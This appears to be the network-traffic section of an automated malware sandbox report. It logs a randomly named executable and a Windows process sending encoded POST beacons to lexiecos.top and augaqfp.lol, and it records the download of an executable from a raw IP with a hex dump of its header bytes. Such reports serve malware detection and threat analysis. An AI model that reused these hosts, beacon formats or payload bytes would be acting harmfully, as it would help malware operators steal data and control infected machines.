                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6d 48 42 71 63 77 34 5a 52 35 49 6a 6a 69 44 51 76 32 61 65 45 2b 7a 4f 7a 47 52 77 57 2b 69 72 7a 73 57 47 4f 77 30 5a 57 37 41 4d 66 6a 67 6a 4d 2b 68 79 6c 53 4f 6d 2f 6b 6e 55 52 70 52 68 6f 66 59 59 65 69 36 46 49 49 50 68 31 58 57 55 30 35 78 71 67 32 32 6b 45 56 31 72 2f 73 44 52 79 61 38 2b 69 6b 4f 4a 36 35 35 73 70 37 49 32 62 7a 39 36 39 4a 58 56 33 4e 76 62 4a 41 44 4f 72 30 2f 2b 4f 56 6c 39 61 7a 61 52 69 42 78 39 73 4c 4e 6c 71 48 47 5a 39 64 49 70 62 61 35 78 72 76 6a 4c 36 54 4c 68 62 6c 44 7a 31 6a 31 6b 54 66 50 46 38 77 4f 75 65 74 33 41 44 77 4d 71 43 54 77 2f 57 31 7a 4d 41 68 55 3d
                  Data Ascii: n02X2xPX=ljhj3Grls4QkmHBqcw4ZR5IjjiDQv2aeE+zOzGRwW+irzsWGOw0ZW7AMfjgjM+hylSOm/knURpRhofYYei6FIIPh1XWU05xqg22kEV1r/sDRya8+ikOJ655sp7I2bz969JXV3NvbJADOr0/+OVl9azaRiBx9sLNlqHGZ9dIpba5xrvjL6TLhblDz1j1kTfPF8wOuet3ADwMqCTw/W1zMAhU=
                  Jul 4, 2024 03:12:19.733378887 CEST533INHTTP/1.1 404 Not Found
                  Date: Thu, 04 Jul 2024 01:12:19 GMT
                  Server: Apache
                  Content-Length: 389
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.449752203.161.55.102802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:21.680033922 CEST10858OUTPOST /ff8d/ HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.lexiecos.top
                  Referer: http://www.lexiecos.top/ff8d/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6d 48 42 71 63 77 34 5a 52 35 49 6a 6a 69 44 51 76 32 61 65 45 2b 7a 4f 7a 47 52 77 57 2b 61 72 7a 61 43 47 4d 58 6f 5a 58 37 41 4d 42 7a 67 69 4d 2b 68 7a 6c 54 6d 35 2f 6b 36 68 52 73 64 68 70 38 51 59 5a 54 36 46 48 49 50 68 33 58 57 52 70 70 77 67 67 79 71 67 45 56 6c 72 2f 73 44 52 79 59 6b 2b 6c 78 79 4a 38 35 35 76 68 62 49 79 66 7a 39 42 39 4b 6e 46 33 4e 6a 68 4a 52 6a 4f 72 51 62 2b 65 33 39 39 46 44 61 70 68 42 77 34 73 4c 4a 6d 71 42 69 64 39 5a 41 54 62 5a 6c 78 71 6f 69 41 39 6a 54 78 45 6d 6d 68 71 44 78 2f 55 2b 6e 48 79 48 62 52 62 39 6e 76 64 41 38 38 47 54 31 4c 52 41 79 4b 53 42 53 54 6b 46 46 4a 65 44 42 68 31 47 52 33 57 66 70 78 48 4d 4a 46 63 6e 6c 47 4e 69 57 2f 77 57 6a 67 6c 69 79 75 49 6f 56 57 59 58 6a 37 69 67 67 67 50 47 57 34 64 67 7a 6a 62 50 69 54 74 75 77 70 75 45 74 4c 6b 61 4b 54 66 4d 32 56 59 6a 56 49 6a 54 32 50 6f 37 6c 43 7a 68 54 75 65 6b 65 54 6f 30 68 38 65 44 65 6e 2b 6c 33 52 66 39 59 69 4c [TRUNCATED]
                  Data Ascii: n02X2xPX=ljhj3Grls4QkmHBqcw4ZR5IjjiDQv2aeE+zOzGRwW+arzaCGMXoZX7AMBzgiM+hzlTm5/k6hRsdhp8QYZT6FHIPh3XWRppwggyqgEVlr/sDRyYk+lxyJ855vhbIyfz9B9KnF3NjhJRjOrQb+e399FDaphBw4sLJmqBid9ZATbZlxqoiA9jTxEmmhqDx/U+nHyHbRb9nvdA88GT1LRAyKSBSTkFFJeDBh1GR3WfpxHMJFcnlGNiW/wWjgliyuIoVWYXj7igggPGW4dgzjbPiTtuwpuEtLkaKTfM2VYjVIjT2Po7lCzhTuekeTo0h8eDen+l3Rf9YiLU5jyVctfKTjF4wEdHLZCMOhxjYuVYJW98UwNmSPnfZ5ua32vbKM7WtVvUCeaNnGegnmsacx+IJdVsC1KXdHJmeAy5L/JSa9R1sSOnQNmbS1brz0ae4TSu7eqA1elR/hriU0tTs7vldeCXQftvN0/MoSag4YbMyNDHns+ZJa6vtCi5OKMAZkTFQLhr3yqzwVPPvoSSXay8f3M211py7Fks8/UN6khsd7LXYPXWf8+qbQgOrHs6P7ZUy4GYOP3UV0hqrVqyRvRGCtzwOKxoSEEF0TpFYXhE5s34HK8FKLcu6FBNvYB5KaM9Jk3tZF2JcfO1aneL+lSY1kC9QTy8hOnlt2FHSg00HTKUdkOcQjgyBiw39yp07QwzQXV0RKrRykydTUNmXWxRuk72J5U7xp5vPk7TMy4lt3oTx2644rTrCoG4vr+o5Z/9PR7LypGv86y0jIg1YMfiQeih8Aj2F7SW330Yi59zYMWKaTu1ZDM0nZWDdDO4QVC5hNXH/Cae7itBps8SfZwLRIZGVgqiUm5X8jyVnw+MKwh4ySSc0auCkml1wdgKNaNtG14OzF9NTcbemwfYRU1TyJoXBMQ5BwfH45GgBGpY0XKQcsTLbuKMVBlmA6wF42hygzNmBlNT8hD1DhBrDvaFkYZFTSKF6T5sx/prIMPfeKGxE [TRUNCATED]
                  Jul 4, 2024 03:12:22.283852100 CEST533INHTTP/1.1 404 Not Found
                  Date: Thu, 04 Jul 2024 01:12:22 GMT
                  Server: Apache
                  Content-Length: 389
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.449753203.161.55.102802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:24.376986027 CEST497OUTGET /ff8d/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g= HTTP/1.1
                  Host: www.lexiecos.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:12:24.993602991 CEST250INHTTP/1.1 200 OK
                  Date: Thu, 04 Jul 2024 01:12:24 GMT
                  Server: Apache
                  Vary: Accept-Encoding
                  Content-Length: 76
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 71 68 56 5a 70 6e 61 47 6c 62 52 55 39 56 52 4c 61 6c 4e 68 58 4d 63 69 67 6b 71 64 33 68 69 59 58 75 2f 4d 74 6a 67 75 51 72 37 4b 33 4d 43 53 53 78 4d 55 5a 5a 45 5a 45 43 30 54 41 64 41 72 6d 52 48 72 6c 32 48 66 54 77 3d 3d
                  Data Ascii: qhVZpnaGlbRU9VRLalNhXMcigkqd3hiYXu/MtjguQr7K3MCSSxMUZZEZEC0TAdArmRHrl2HfTw==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.449754185.234.72.101801908C:\Windows\SysWOW64\RMActivate_ssp.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:29.437565088 CEST230OUTGET /VT3g2PdlLRVpwBp.exe HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Host: 185.234.72.101
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Jul 4, 2024 03:12:30.084703922 CEST1236INHTTP/1.1 200 OK
                  Date: Thu, 04 Jul 2024 01:12:30 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 05:35:30 GMT
                  ETag: "f0400-61c5132d1e957"
                  Accept-Ranges: bytes
                  Content-Length: 984064
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ea 3a a0 f5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 0e 00 00 66 00 00 00 00 00 00 32 bb 0e 00 00 20 00 00 00 c0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 df ba 0e 00 4f 00 00 00 00 c0 0e 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0f 00 0c 00 00 00 c0 9d 0e 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:0f2 @ `@Od@p H.text8 `.rsrcdd@@.reloc@@BHXkE50}s}}(({o(C,b{rporpo{(J(o{o{rpo}8U}{r)por)po(C{oX(o{oZo{o^(o{o\(o
                  Jul 4, 2024 03:12:30.084984064 CEST1236INData Raw: 7b 06 00 00 04 08 6f 60 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 02 7b 07 00 00 04 08 6f 62 00 00 06 0b 12 01 28 19 00 00 0a 6f 18 00 00 0a 00 08 75 08 00 00 02 14 fe 03 13 04 11 04 2c 48 00 02 7b 12 00 00 04 17 6f 1a 00 00 0a 00 02 7b
                  Data Ascii: {o`(o{ob(ou,H{o{rpo{to>(o}+>{o{rApo{toUo}{o(&{o*{
                  Jul 4, 2024 03:12:30.084990025 CEST1236INData Raw: 00 09 11 04 30 0e 09 16 32 07 11 04 16 fe 04 2b 01 17 2b 01 17 13 0b 11 0b 39 98 00 00 00 00 02 7b 06 00 00 04 28 22 00 00 0a 6f 23 00 00 0a 00 02 7b 07 00 00 04 28 22 00 00 0a 6f 23 00 00 0a 00 09 11 04 fe 02 13 0c 11 0c 2c 32 00 02 7b 03 00 00
                  Data Ascii: 02++9{("o#{("o#,2{{rpo${{rKpo$+0{{rpo${{rpo$80+,~{("o#{("o#{("
                  Jul 4, 2024 03:12:30.086328030 CEST1236INData Raw: 7b 06 00 00 04 02 fe 06 09 00 00 06 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 7b 07 00 00 04 1f 74 20 1d 01 00 00 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 07 00 00 04 72 31 04 00 70 6f 36 00 00 0a 00 02 7b 07 00 00 04 1f 4a 1f 14 73 37 00 00 0a 6f 38 00
                  Data Ascii: {s:o;{t s4o5{r1po6{Js7o8{o9{s:o;{v s4o5{r=po6{ s7o8{o9{s:o;{v s4
                  Jul 4, 2024 03:12:30.086333036 CEST1236INData Raw: 00 00 04 1f 45 1f 53 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 11 00 00 04 72 1d 05 00 70 6f 36 00 00 0a 00 02 7b 11 00 00 04 1f 1b 1f 18 73 37 00 00 0a 6f 38 00 00 0a 00 02 7b 11 00 00 04 1f 0c 6f 39 00 00 0a 00 02 7b 11 00 00 04 72 29 05 00 70 6f
                  Data Ascii: ESs4o5{rpo6{s7o8{o9{r)po{o1{rp"@As2o3{ s4o5{r/po6{es7o8{o9{o<{rCpo{
                  Jul 4, 2024 03:12:30.087090015 CEST1236INData Raw: 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 09 00 00 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 0a 00 00 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 0b 00 00 04 6f 44 00 00 0a 00 02 28 43 00 00 0a 02 7b 0c 00 00 04 6f 44 00 00 0a 00 02 28 43
                  Data Ascii: oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(C{oD(E(Frp(6rpo(G(H*
                  Jul 4, 2024 03:12:30.087101936 CEST1236INData Raw: 0a 00 2a 00 00 13 30 03 00 86 00 00 00 07 00 00 11 00 02 7b 2b 00 00 04 6f 53 00 00 0a 2c 15 02 7b 2b 00 00 04 6f 53 00 00 0a 6f 54 00 00 0a 16 fe 01 2b 01 17 0b 07 2c 0e 00 72 85 06 00 70 28 55 00 00 0a 26 2b 4f 72 c5 06 00 70 72 1b 07 00 70 1a
                  Data Ascii: *0{+oS,{+oSoT+,rp(U&+Orprp(X,+3{{+oSoVuoY&{2(o*0p{.o(&,{*~KoJ+F~K sZ(+(+o]
                  Jul 4, 2024 03:12:30.088169098 CEST1236INData Raw: 02 7b 25 00 00 04 72 b9 02 00 70 6f 24 00 00 0a 00 16 13 04 00 2b 69 00 02 7b 24 00 00 04 28 25 00 00 0a 6f 23 00 00 0a 00 02 7b 25 00 00 04 28 25 00 00 0a 6f 23 00 00 0a 00 02 7b 1a 00 00 04 02 7b 27 00 00 04 72 93 00 00 70 6f 24 00 00 0a 00 02
                  Data Ascii: {%rpo$+i{$(%o#{%(%o#{{'rpo${{$rpo${{%rpo$+*0+,{+,{o*(+*0<s,}s_}s-}$
                  Jul 4, 2024 03:12:30.088176012 CEST1236INData Raw: 00 02 7b 1d 00 00 04 6f 63 00 00 0a 6f 43 00 00 0a 02 7b 2b 00 00 04 6f 44 00 00 0a 00 02 7b 1d 00 00 04 6f 63 00 00 0a 6f 43 00 00 0a 02 7b 2a 00 00 04 6f 44 00 00 0a 00 02 7b 1d 00 00 04 20 18 03 00 00 20 84 01 00 00 73 37 00 00 0a 6f 38 00 00
                  Data Ascii: {ocoC{+oD{ocoC{*oD{ s7o8{ od{o9{$ s4o5{$r%po6{$Js7o8{$o9{$s:o;{%5 s4o5{
                  Jul 4, 2024 03:12:30.089225054 CEST1236INData Raw: 0a 00 02 7b 1f 00 00 04 17 6f 31 00 00 0a 00 02 7b 1f 00 00 04 72 b7 03 00 70 22 00 00 64 41 16 19 16 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 1f 00 00 04 1f 23 1f 61 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 1f 00 00 04 72 03 05 00 70 6f 36 00 00 0a
                  Data Ascii: {o1{rp"dAs2o3{#as4o5{rpo6{=s7o8{o9{rpo{ o1{ rp"dAs2o3{ E-s4o5{ rpo6{ s7o8{
                  Jul 4, 2024 03:12:30.091783047 CEST1236INData Raw: 00 04 1f 0c 6f 39 00 00 0a 00 02 7b 2a 00 00 04 02 fe 06 10 00 00 06 73 68 00 00 0a 6f 69 00 00 0a 00 02 7b 32 00 00 04 72 b7 03 00 70 22 00 00 1c 41 17 19 16 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 32 00 00 04 20 54 02 00 00 20 bb 01 00 00 73 34
                  Data Ascii: o9{*shoi{2rp"As2o3{2 T s4o5{2r1po6{2](s7o8{2o9{2rpo{2o={2s:o>{3rp"As2o3{3 s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.449758116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:35.806169987 CEST753OUTPOST /l8a4/ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.augaqfp.lol
                  Referer: http://www.augaqfp.lol/l8a4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 43 64 41 44 4a 74 59 7a 4a 6b 4c 4b 32 6e 5a 38 62 57 70 4e 78 46 76 52 56 49 4d 73 33 34 36 32 76 77 73 35 65 53 76 31 63 31 62 78 6c 76 69 46 43 69 65 4d 42 77 4e 51 41 54 52 53 74 63 67 41 5a 4e 4a 47 71 65 2f 56 2b 79 4d 6b 42 34 50 6c 30 46 43 35 56 34 4c 35 4e 47 45 44 38 38 64 34 67 65 70 31 52 46 46 44 6a 53 7a 43 71 33 75 72 73 79 4e 31 65 64 59 64 64 2f 69 76 4a 4f 50 70 4d 36 46 61 71 66 7a 6c 4a 47 45 78 4d 51 55 33 5a 6f 52 66 63 73 6d 79 41 75 71 32 63 2b 50 61 43 77 66 47 6a 72 43 2b 58 4e 33 57 36 65 6a 70 45 6e 53 71 77 3d 3d
                  Data Ascii: n02X2xPX=PNjbb7H5aWjLkCdADJtYzJkLK2nZ8bWpNxFvRVIMs3462vws5eSv1c1bxlviFCieMBwNQATRStcgAZNJGqe/V+yMkB4Pl0FC5V4L5NGED88d4gep1RFFDjSzCq3ursyN1edYdd/ivJOPpM6FaqfzlJGExMQU3ZoRfcsmyAuq2c+PaCwfGjrC+XN3W6ejpEnSqw==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.449761116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:38.577179909 CEST773OUTPOST /l8a4/ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.augaqfp.lol
                  Referer: http://www.augaqfp.lol/l8a4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 68 46 41 50 4b 31 59 6a 5a 6b 49 41 57 6e 5a 72 4c 57 74 4e 78 42 76 52 58 6b 63 74 42 41 36 33 4e 34 73 34 66 53 76 30 63 31 62 2b 46 76 6e 4b 69 69 46 4d 41 4d 2f 51 46 72 52 53 74 49 67 41 63 4a 4a 46 5a 6e 70 58 75 79 43 38 78 34 4e 34 45 46 43 35 56 34 4c 35 4e 6a 72 44 36 55 64 35 55 69 70 33 7a 68 61 41 6a 53 30 53 4b 33 75 76 73 79 4a 31 65 64 2b 64 59 58 45 76 4d 4b 50 70 4e 71 46 62 37 66 77 76 4a 47 43 38 73 51 4c 37 63 45 5a 64 4d 67 6f 7a 7a 75 6d 35 66 65 6b 66 45 68 46 58 53 4b 56 73 58 70 45 4c 39 58 58 6b 48 61 62 78 78 5a 34 56 57 6d 75 63 6c 48 48 65 38 55 4c 38 61 56 59 6d 70 51 3d
                  Data Ascii: n02X2xPX=PNjbb7H5aWjLkhFAPK1YjZkIAWnZrLWtNxBvRXkctBA63N4s4fSv0c1b+FvnKiiFMAM/QFrRStIgAcJJFZnpXuyC8x4N4EFC5V4L5NjrD6Ud5Uip3zhaAjS0SK3uvsyJ1ed+dYXEvMKPpNqFb7fwvJGC8sQL7cEZdMgozzum5fekfEhFXSKVsXpEL9XXkHabxxZ4VWmuclHHe8UL8aVYmpQ=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.449762116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:41.121562004 CEST10855OUTPOST /l8a4/ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.augaqfp.lol
                  Referer: http://www.augaqfp.lol/l8a4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 68 46 41 50 4b 31 59 6a 5a 6b 49 41 57 6e 5a 72 4c 57 74 4e 78 42 76 52 58 6b 63 74 43 67 36 32 2b 67 73 34 38 36 76 7a 63 31 62 33 6c 76 6d 4b 69 69 45 4d 42 6b 42 51 45 58 42 53 75 77 67 47 2b 42 4a 52 34 6e 70 65 75 79 43 67 42 34 4d 6c 30 46 62 35 56 6f 50 35 4e 54 72 44 36 55 64 35 56 79 70 2b 42 46 61 4d 44 53 7a 43 71 33 71 72 73 79 74 31 65 31 41 64 59 54 79 73 34 2b 50 77 74 61 46 59 49 33 77 6e 4a 47 41 37 73 52 65 37 63 42 48 64 4d 74 58 7a 77 7a 4a 35 59 75 6b 54 42 63 48 45 47 4f 55 35 32 39 68 52 64 79 79 6f 47 4f 32 37 47 52 39 52 6b 43 6c 65 57 36 71 51 50 35 44 70 5a 35 76 36 39 78 4b 45 49 75 71 6f 48 73 79 64 4b 6c 6f 45 53 51 4b 35 37 7a 74 57 49 51 43 76 54 51 77 4c 56 45 4b 2b 49 77 43 43 75 55 6d 38 6e 55 76 74 72 47 45 4d 55 41 74 41 6b 57 6e 45 57 43 74 71 32 44 38 73 65 50 53 4d 7a 37 4d 54 76 76 35 79 32 4b 4a 6d 75 30 4d 7a 67 53 4a 6f 30 41 5a 4c 7a 49 4d 4e 38 46 6d 38 65 67 71 43 67 39 72 34 4d 79 4a 4c [TRUNCATED]
                  Data Ascii: n02X2xPX=PNjbb7H5aWjLkhFAPK1YjZkIAWnZrLWtNxBvRXkctCg62+gs486vzc1b3lvmKiiEMBkBQEXBSuwgG+BJR4npeuyCgB4Ml0Fb5VoP5NTrD6Ud5Vyp+BFaMDSzCq3qrsyt1e1AdYTys4+PwtaFYI3wnJGA7sRe7cBHdMtXzwzJ5YukTBcHEGOU529hRdyyoGO27GR9RkCleW6qQP5DpZ5v69xKEIuqoHsydKloESQK57ztWIQCvTQwLVEK+IwCCuUm8nUvtrGEMUAtAkWnEWCtq2D8sePSMz7MTvv5y2KJmu0MzgSJo0AZLzIMN8Fm8egqCg9r4MyJLtY7g4rY2e9AthZa1hjVn+Vu1UFdz9TbrIo4OD9ipRb6gsC3cfXslA/EX060hxIvVJsJZ3K9+rR/A9spN5m4Emhvl+w+FhMekbtas2taVeqUNrp6Hz8YhW8RqGMlKOmcN4nUBKRaesebam2D9UrXJtWZ+tOJcMPH8DaZemT4d342mrVURNYsr/aWZO8owsVgkdkhQsjLsAlUK24eJhBqtybrCv2OURoNo+2bLr3HSctL3C9tctIP8T6LTMUJOkm2GGpyyzj4HQUJMGtP64WYnnS0lsZ641k6OEDG3mJCvvu2IUSk09tjwJP0FoVn9ajSMD/7qdRY/fGA//zpMVDGRp9rS4aDGa1vZzD1rN2mLot9s5pIstMrOZqznuvlkvpIyvjRtkfbDt/ypObadNSqANO9